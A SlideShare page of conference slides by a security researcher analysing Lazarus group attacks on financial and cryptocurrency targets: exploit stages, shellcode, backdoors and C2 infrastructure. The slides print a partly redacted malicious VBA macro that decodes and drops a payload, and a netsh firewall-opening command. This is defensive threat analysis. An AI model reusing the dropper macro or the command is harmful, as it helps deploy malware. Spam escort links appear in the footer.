SlideShare una empresa de Scribd logo

AREA41 - Anatomy of attacks aimed at financial sector by the Lazarus group

S
SeongsuPark8

Presentation slides for AREA41 conference about Lazarus group's attack aimed at financial sector

Presentaciones y charlas públicas
1 de 50
Anatomy of attacks aimed at financial sector by the Lazarus group June 28, 2018 Seongsu Park Senior Security Researcher @ Kaspersky Lab GReAT
Who is Lazarus? • Notorious APT group • State-sponsored APT group • Aimed at financial profit and cyber espionage, sabotage LAZARUS Andariel Bluenoroff …… …… Well-known attack case 2013 — DarkSeoul cyber attack 2014 — SPE cyber attack 2016 — Bangladesh bank heist 2017 — WannaCry outbreak
Recent activities of Lazarus
About Manuscrypt • From when?  Start to use Manuscrypt from around 2013  Use it actively until recent • Connection?  Many overlap with known Lazarus code style and C&C infrastructure • Attack where?  Usually attacked national intelligence before  Recently, used when attacked financial sector
5 Attacks on South Korea
Status of cryptocurrency exchange of Korea World TOP 10 Cryptocurrency Exchanges South Korea company
Continuous hacked Korea exchanges
Infection vectors MALICIOUS HWP MALICIOUS OFFICE MALICIOUS APK
Weaponized hwp HWP file format • Hangul (also known as Hangul Word Processor or HWP) is a proprietary word processing application published by the South Korean company Hancom Inc. -Wikipedia • Used by most government agencies and government offices due to national software activation policy of Government • The South Korea is one of the few countries where MS Word does not rank first Recently, postscript mainly used to deliver payload
Decoy and targets Cryptocurrency Any cryptocurrency related news/contents Cryptocurrency market expectation Legal issues Related to lawsuit or audit Forms about legal issues Resume Resume of mainly financial related person Some decoy include victim company name
Relationship Last saved user name Author name Malicious hwp
Postscript Type #1 — Postscript has asciihex-format executable — Drop file %startup% folder for persistence mechanism — Dropped file is Manuscrypt Direct drop from embedded ascii hex string Creation path (+persistence mechanism) asciihex type payload Asciihex type Manuscrypt Postscript to drop executable Drop and execute Structure
Postscript Type #2 — Use Chinese variable name i.e.) yaoshi, yima, yinzi — Decrypt real postscript/shellcode with hardcoded XOR key Has encryption stage with 4-bytes XOR key 4-bytes XOR key Encrypted postscript & Shellcode Postscript to decrypt Decrypt Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Encrypted postscript and shellcode Encrypted Manuscrypt executable
Postscript Type #2 – Decrypted data — Decrypted data contains exploit code and shellcode — Trigger the postscript vulnerability and execute shellcode Has encryption stage with 4-bytes XOR key Encrypted postscript & Shellcode Postscript to decrypt Exploit, Decrypt payload and inject Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Shellcode to decrypt payload and inject Heap-spray Exploit code
Postscript Type #3-4 — Remove decryption process — Malware author elaborate exploit code Elaborated exploit code Shellcode Postscript Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Shellcode Encrypted Manuscrypt Decrypt & Inject
Postscript type #5 – add XOR — Same structure with #3 — Add shellcode decryption script with 1-byte XOR Elaborated exploit code Script for decryption of shellcode Shellcode Postscript Decrypt & Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject
Postscript type #6 — Same postscript to trigger vulnerability — No more embedded payload — Shellcode just has download function Change shellcode function Shellcode Postscript Structure Postscript Decrypt & Exploit Download Manuscrypt
Change history of hwp attack Type #2 • Start to use postscript vulnerability • Decrypt shellcode and exploitation postscript with 4-bytes XOR • Decrypt payload with 4-bytes XOR key Type #3 • Remove shellcode/postscript decryption routine • Elaborate postscript to trigger vulnerability • Decrypt payload with 4-bytes XOR key Type #4 • Decrypt payload with AES algorithm Type #5 • Add shellcode encryption postscript with 1-byte XOR Type #6 • Change shellcode just download payload Type #1 • Drop embedded asciihex type payload
Change history of hwp attack Asciihex type Manuscrypt Postscript to drop executable Drop and execute Structure Encrypted postscript & Shellcode Postscript to decrypt Decrypt Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Shellcode Postscript Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject Shellcode Postscript Decrypt & Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject Shellcode Postscript Structure Postscript Decrypt & Exploit Download Manuscrypt Type #1 Type #2 Type #3, 4 Type #5 Type #6 Decrypt & Inject
Change history of hwp attack Type #1 Type #6Type #2 Type #5Type #4Type #3 4-bytes XOR Shellcode Decryption 1-bytes XOR 1-bytes XOR Shellcode Triggering CVE-2017-8291 (Ghostscript exploit) Shellcode Type Decrypt embedded payload and inject to legit process Download 4-bytes XOR AES Payload Decryption
21 Attacker vs Defender Type #1 Direct drop from asciihex string 2017-04 2017-06 2017-07 2017-08 2017-09 2017-10 2017-11 2017-12 2018-03 Type #2 Start to use Exploit XORed shellcode + exploit trigger script Type #4 Replace to AES algorithm Type #3 Polishing exploit script 4-bytes XOR decryption Type #6 Download payload from remote server Type #5 Decrypt shellcode with 1-byte XOR ATTACKER SIDE DEFENDER SIDE Detect embedded ascii type executable Detect XOR postscript routine Detect embedded shellcode in postscript Detect embedded encrypted payload
Shellcode comparison from each types Different postscripts, but same shellcode
Shellcode comparison from each types Different postscripts, but same shellcode Process searching Get handle
Shellcode Shellcode execution flow Get API by hash Decrypt payload Find decryption key Get Handle Inject to legit process
Payload summary IP-based C&C communication type • Only used up to type #2 • Not seen after November 2017 • Fake SSL communication • Full featured backdoor - File handling - Process handling - Execute commands - Data exfiltration HTTP-based C&C communication type • Usually used this type communications • Using compromised server • Full featured backdoor - System info gathering - Execute commands - and so on
Type of C&C servers COMPROMISED SERVER — Compromised server — Direct connect by IP address — Encryption channel COMPROMISED WEB SERVER IN CHINA — Usually compromised IIS server — Upload attacker’s PHP scripts — DedeCMS vulnerability — Wordpress vulneraility COMPROMISED WEB SERVER IN KOREA — Usually compromised IIS server — Upload attacker’s JSP scripts — Using specific board vulnerability — Using wordpress vulnerability
Not only hwp file
Not only hwp file Persistence attack 2017-07-31 07:40:07 비트코인_지갑주소 _및_거래번호.hwp e3796387 (web) KR 2017-07-31 16:25:00 비트코인_지갑주소 _및_거래번호.doc e3796387 (web) KR 2017-08-03 18:13:23 비트코인 거래내역.xls e3796387 (web) KR Decoy of malicious hwp Decoy of malicious word
29 Attacks on other countries
Attack methodology SPEARPHISHING — Malicious office document — Malicious macro embedded — Decoy : Usually used job description and proposal
Attack methodology Structure of Macro Attribute VB_Name = "Module1" Sub Auto_Open() On Error GoTo gaqz liveOn = "sjop/fyf" liveOff = Environ("temp") + "" For qnx = 1 To Len(liveOn) liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1) Next Dim str(1635) As String str(1) = "F0E72DBDBEBDBDBD………[redacted]……………DBDBDBD" .... [redacted]…. str(1635) = "9D9D9D9D9D9D81…. ……[redacted]…..….……DBDBDBD" Dim offBin(499) As Byte Open liveOff For Binary Access Write As #1 lpdq = 1 For jnx = 0 To 1634 For inx = 0 To 499 offBin(inx) = Val("&H" + Mid(str(jnx + 1), inx * 2 + 1, 2)) offBin(inx) = offBin(inx) Xor 189 Next inx Macro to create payload liveOn = "EFG492:2/ymt" liveOffd = Environ("temp") + "" For qnx = 1 To Len(liveOn) liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1) Next qnx Dim strd(239) As String strd(1) = "1906D8296878D328C9C9C9…[redacted]…..36363636363636" ...... [redacted]…… strd(239) = "C9C9C9C9C9C9C9C9C9C9…[redacted]…….D9C9C9C9C9C9C9" Dim offBind(499) As Byte Open liveOffd For Binary Access Write As #2 lpdq = 1 For jnx = 0 To 238 For inx = 0 To 499 offBind(inx) = Val("&H" + Mid(strd(jnx + 1), inx * 2 + 1, 2)) offBind(inx) = offBind(inx) Xor 201 Next inx Put #2, lpdq, offBind lpdq = lpdq + 500 Next jnx Close #2 Macro to create decoy document
Who is target? Finance Engineering Crypto Currency
Payload summary • File search, handling • Process handling • Collect system information • Directory / File listing …… Full-featured backdoor a.k.a Fallchill • IP-based C&C communication - Fake SSL communication (Polar SSL) - Used compromised server • HTTP-based C&C communication - Compromised ASP hosting IIS server - Allegedly used board/CMS vulnerability
34 C&C server Configuration
How did I start this investigation? Malicious hwp dropped Manuscrypt Found 1 C&C server in South Korea — Suspected compromised server Working closely with investigation agency — Investigate compromised server — Found one proxy module Expanding research with our telemetry — Yara magic! — Found additional module from compromised sever
Manuscrypt C2 infrastructure Manuscrypt infected host Send information Multi-stage Proxy Servers Communication Final-stage C2 server
Manuscrypt C2 Geolocations
Malwares/Tools from C&C server Sensing the production process, manipulating the production process Monitoring, supervisory control and automated control of the production process Backdoor Variants Threat actor uses many kind of backdoors - Active backdoor, Passive backdoor, HTTP backdoor, IIS backdoor Proxy Malware Main component of multi stage of proxy structure, forward incoming traffic to other host Information Harvester TCP connection harvester to steal inbound/outbound network connections Other Tools Loader to decrypt and execute encrypted payload, File wiper to wipe out specific file securely
Proxy module Simply forward traffic from incoming host to next hop Firewall punching Add allowed port list using windows command Fake SSL communication Disguised as legit sites SSL handshaking Configuration Stores configuration at registry key Saved configuration as specific file Updating file with data from another hop Decrypt this file when read
Proxy module – P2P proxy another infected host Listening named pipe ((.pipeAnonymousPipe) Connect to external named pipe (%spipeAnonymousPipe) Polar SSL Encryption Thread #1 : Receive data from global P2P and write it to listened named pipe Listening named pipe ((.pipeAnonymousPipe) Thread #2 : Read data from external named pipe and send it to global P2P server Global P2P C&C server (Passive backdoor module installed) P2P-based C&C infrastructures
Active backdoor Has C&C server address, performs backdoor functions IP-based communications - Configuration data in registry key - Full-featured backdoor • File / directory listing • Process handling • Get system information • Execute windows command • Send screenshot HTTP-based communications - Same configuration data with IP-based backdoor - Choose HEAD, GET or POST method randomly when communicate C&C server - Full-featured backdoor
Passive backdoor Doesn’t have C&C server address, Open port and wait connections Get Windows service list and choose one INSTALLATION PROCESS Get display name of service and append “Service” Append decrypted strings at service display name Change service name as small case and append “svc” Drop payload as service name Change file timestamp i.e. Choose “SharedAccess” service i.e. Change “Internet Connection Sharing (ICS)" display name to “Internet Connection Sharing Service” i.e. SharedAccess -> sharedaccesssvc i.e. Drop payload to sharedaccesssvc.dll i.e. Append “is an essential element in Windows System configuration and management.” F/W Punching cmd.exe /c netsh firewall add portopening TCP [Port] "adp" Backdoor functions - Almost same with active backdoor - Some variants has routing functions
Other tools Log Wiper Generate random buffer Overwrite file with that data repeatly Delete file TCP Connection Harvester Choose proper API depends on OS version File name
Malwares/Tools from C&C server Indonesia India Bangladesh Malaysia Vietnam Korea Taiwan Thailand Active Backdoor Passive Backdoor Proxy TCP conn Harvester IIS Backdoor HTTP Backdoor
Malwares/Tools from C&C server India Active backdoor Columbia Dominican Republic GermanyIndonesia South Korea Sri Lanka Case #1 Panama Proxy HTTP Backdoor Passive Backdoor Vietnam TCP Conn Harvester Case #2
Vulnerability information IP Web server ver OS fingerprinting 2xx.xx.xx.xxx N/A Windows Server 2003 R2 5x.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows Server 2003 (91%), Microsoft Windows Server 2003 SP2 (91%) 2xx.xx.xx.xxx IIS 6.0 N/A 1xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows 2003 R2 (93%), Microsoft Windows Server 2003 (93%), Microsoft Windows Server 2003 SP2 (93%) 2xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%), 1xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (99%), Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%), 2xx.xx.xx.xxx IIS 6.0 N/A 2xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (89%) 5x.xx.xx.xxx N/A Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows Server 2003 SP1 - SP2 (92%)
Vulnerability information 2017-03-26 CVE-2017-7269 published 2017-04-11 Attack tool for this exploit was created 2017-03-31 PoC for CVE-2017-7269 added to Metasploit module 2017-06-13 Microsoft published patch for this vulnerability
Let’s put them together Active backdoor Passive backdoor Proxy module TCP harvester ……Victim (Manuscrypt infected) Weaponized hwp/doc Corporate Users Sometimes infect corporate hosts from server C&C server Infrastructure Configure C&C infra Control infected hosts Communicate multi-stage C&C
Takeaways • Never let your server compromised by them • They keep polishing their tools • Their favorite attack vector is spearphishing • Recently, they are changing their TTPs • Let’s head up their TTPs
LET’S TALK? Twitter : @unpacker Mail : seongsup4rk@gmail.com

Recomendados

Trojans and backdoors
Trojans and backdoorsTrojans and backdoors
Trojans and backdoors
Gaurav Dalvi
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
enigma0x3
 
Ransomware Attack.pptx
Ransomware Attack.pptxRansomware Attack.pptx
Ransomware Attack.pptx
IkramSabir4
 
What is Open Source Intelligence (OSINT)
What is Open Source Intelligence (OSINT)What is Open Source Intelligence (OSINT)
What is Open Source Intelligence (OSINT)
Molfar
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf
 
Security Measure
Security MeasureSecurity Measure
Security Measure
syafiqa
 
Mobil Pentest Eğitim Dökümanı
Mobil Pentest Eğitim DökümanıMobil Pentest Eğitim Dökümanı
Mobil Pentest Eğitim Dökümanı
Ahmet Gürel
 

Recomendados

Trojans and backdoors
Trojans and backdoorsTrojans and backdoors
Trojans and backdoors
Gaurav Dalvi
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
enigma0x3
 
Ransomware Attack.pptx
Ransomware Attack.pptxRansomware Attack.pptx
Ransomware Attack.pptx
IkramSabir4
 
What is Open Source Intelligence (OSINT)
What is Open Source Intelligence (OSINT)What is Open Source Intelligence (OSINT)
What is Open Source Intelligence (OSINT)
Molfar
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf
 
Security Measure
Security MeasureSecurity Measure
Security Measure
syafiqa
 
Mobil Pentest Eğitim Dökümanı
Mobil Pentest Eğitim DökümanıMobil Pentest Eğitim Dökümanı
Mobil Pentest Eğitim Dökümanı
Ahmet Gürel
 
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
BGA Cyber Security
 
Cyber Security Standards Compliance
Cyber Security Standards ComplianceCyber Security Standards Compliance
Cyber Security Standards Compliance
Dr. Prashant Vats
 
Malware
MalwareMalware
Malware
Tuhin_Das
 
Sandbox Technology in AntiVirus
Sandbox Technology in AntiVirusSandbox Technology in AntiVirus
Sandbox Technology in AntiVirus
Ashish Gautam
 
COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019
David Tulis
 
Shodan
ShodanShodan
Shodan
J M
 
(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains
idsecconf
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
Jignesh Patel
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Mobile Malware
Mobile MalwareMobile Malware
Mobile Malware
Martin Holovský
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
Er. Shiva K. Shrestha
 
Port Scanning
Port ScanningPort Scanning
Port Scanning
amiable_indian
 
Practical Malware Analysis: Ch 8: Debugging
Practical Malware Analysis: Ch 8: Debugging Practical Malware Analysis: Ch 8: Debugging
Practical Malware Analysis: Ch 8: Debugging
Sam Bowne
 
Anti virus
Anti virusAnti virus
Anti virus
Marlon San Luis
 
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
WifiCren
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
Kaustubh Padwad
 
Rust programming-language
Rust programming-languageRust programming-language
Rust programming-language
Mujahid Malik Arain
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
Ankita Ganguly
 
The Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityThe Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet Anonymity
Abhimanyu Singh
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
cclark_isec
 
Analysing Ransomware
Analysing RansomwareAnalysing Ransomware
Analysing Ransomware
Napier University
 
Cryptanalysis in the Time of Ransomware
Cryptanalysis in the Time of RansomwareCryptanalysis in the Time of Ransomware
Cryptanalysis in the Time of Ransomware
Mark Mager
 

Más contenido relacionado

La actualidad más candente

Sandbox Technology in AntiVirus
Sandbox Technology in AntiVirusSandbox Technology in AntiVirus
Sandbox Technology in AntiVirus
Ashish Gautam
 
COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019
David Tulis
 
Shodan
ShodanShodan
Shodan
J M
 
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
WifiCren
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
Kaustubh Padwad
 

La actualidad más candente (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Cyber Security Standards Compliance
Cyber Security Standards ComplianceCyber Security Standards Compliance
Cyber Security Standards Compliance
 
Malware
MalwareMalware
Malware
 
Sandbox Technology in AntiVirus
Sandbox Technology in AntiVirusSandbox Technology in AntiVirus
Sandbox Technology in AntiVirus
 
COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019
 
Shodan
ShodanShodan
Shodan
 
(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Port scanning
Port scanningPort scanning
Port scanning
 
Mobile Malware
Mobile MalwareMobile Malware
Mobile Malware
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
 
Port Scanning
Port ScanningPort Scanning
Port Scanning
 
Practical Malware Analysis: Ch 8: Debugging
Practical Malware Analysis: Ch 8: Debugging Practical Malware Analysis: Ch 8: Debugging
Practical Malware Analysis: Ch 8: Debugging
 
Anti virus
Anti virusAnti virus
Anti virus
 
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
435680909-MTCNA-CFP-UPV-Modulo-1-Introduccion-a-Mikrotik-RouterOS.pdf
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
Rust programming-language
Rust programming-languageRust programming-language
Rust programming-language
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
The Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityThe Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet Anonymity
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 

Similar a AREA41 - Anatomy of attacks aimed at financial sector by the Lazarus group

Cryptography
CryptographyCryptography
Cryptography
Rohan04
 
Analysing space complexity of various encryption algorithms 2
Analysing space complexity of various encryption algorithms 2Analysing space complexity of various encryption algorithms 2
Analysing space complexity of various encryption algorithms 2
IAEME Publication
 
Analysis of Cryptographic Algorithms
Analysis of Cryptographic AlgorithmsAnalysis of Cryptographic Algorithms
Analysis of Cryptographic Algorithms
ijsrd.com
 
SE-4128, DRM: From software secrets to hardware protection, by Rod Schultz
SE-4128, DRM: From software secrets to hardware protection, by Rod SchultzSE-4128, DRM: From software secrets to hardware protection, by Rod Schultz
SE-4128, DRM: From software secrets to hardware protection, by Rod Schultz
AMD Developer Central
 

Similar a AREA41 - Anatomy of attacks aimed at financial sector by the Lazarus group (20)

Analysing Ransomware
Analysing RansomwareAnalysing Ransomware
Analysing Ransomware
 
Cryptanalysis in the Time of Ransomware
Cryptanalysis in the Time of RansomwareCryptanalysis in the Time of Ransomware
Cryptanalysis in the Time of Ransomware
 
Cryptography
CryptographyCryptography
Cryptography
 
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderBreaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
Cryto Party at CCU
Cryto Party at CCUCryto Party at CCU
Cryto Party at CCU
 
Advances in Open Source Password Cracking
Advances in Open Source Password CrackingAdvances in Open Source Password Cracking
Advances in Open Source Password Cracking
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
Analysing space complexity of various encryption algorithms 2
Analysing space complexity of various encryption algorithms 2Analysing space complexity of various encryption algorithms 2
Analysing space complexity of various encryption algorithms 2
 
How does cryptography work? by Jeroen Ooms
How does cryptography work? by Jeroen OomsHow does cryptography work? by Jeroen Ooms
How does cryptography work? by Jeroen Ooms
 
Webinar alain-2009-03-04-clamav
Webinar alain-2009-03-04-clamavWebinar alain-2009-03-04-clamav
Webinar alain-2009-03-04-clamav
 
International Journal of Engineering Research and Development
International Journal of Engineering Research and DevelopmentInternational Journal of Engineering Research and Development
International Journal of Engineering Research and Development
 
Encryption
EncryptionEncryption
Encryption
 
Day5
Day5Day5
Day5
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Secured algorithm for gsm encryption & decryption
Secured algorithm for gsm encryption & decryptionSecured algorithm for gsm encryption & decryption
Secured algorithm for gsm encryption & decryption
 
Analysis of Cryptographic Algorithms
Analysis of Cryptographic AlgorithmsAnalysis of Cryptographic Algorithms
Analysis of Cryptographic Algorithms
 
Nwc rsa
Nwc rsaNwc rsa
Nwc rsa
 
SE-4128, DRM: From software secrets to hardware protection, by Rod Schultz
SE-4128, DRM: From software secrets to hardware protection, by Rod SchultzSE-4128, DRM: From software secrets to hardware protection, by Rod Schultz
SE-4128, DRM: From software secrets to hardware protection, by Rod Schultz
 
Linux IoT Botnet Wars and the lack of basic security hardening
Linux IoT Botnet Wars and the lack of basic security hardeningLinux IoT Botnet Wars and the lack of basic security hardening
Linux IoT Botnet Wars and the lack of basic security hardening
 

Último

BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
Delhi Call girls
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Delhi Call girls
 
Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac Folorunso
Kayode Fayemi
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
raffaeleoman
 

Último (20)

Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio III
 
Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510
 
Air breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animalsAir breathing and respiratory adaptations in diver animals
Air breathing and respiratory adaptations in diver animals
 
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Sector 93 Noida Escorts >༒8448380779 Escort Service
 
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, YardstickSaaStr Workshop Wednesday w/ Lucas Price, Yardstick
SaaStr Workshop Wednesday w/ Lucas Price, Yardstick
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatment
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
 
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara ServicesVVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
VVIP Call Girls Nalasopara : 9892124323, Call Girls in Nalasopara Services
 
Presentation on Engagement in Book Clubs
Presentation on Engagement in Book ClubsPresentation on Engagement in Book Clubs
Presentation on Engagement in Book Clubs
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptx
 
Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac Folorunso
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.
 
ICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdfICT role in 21st century education and it's challenges.pdf
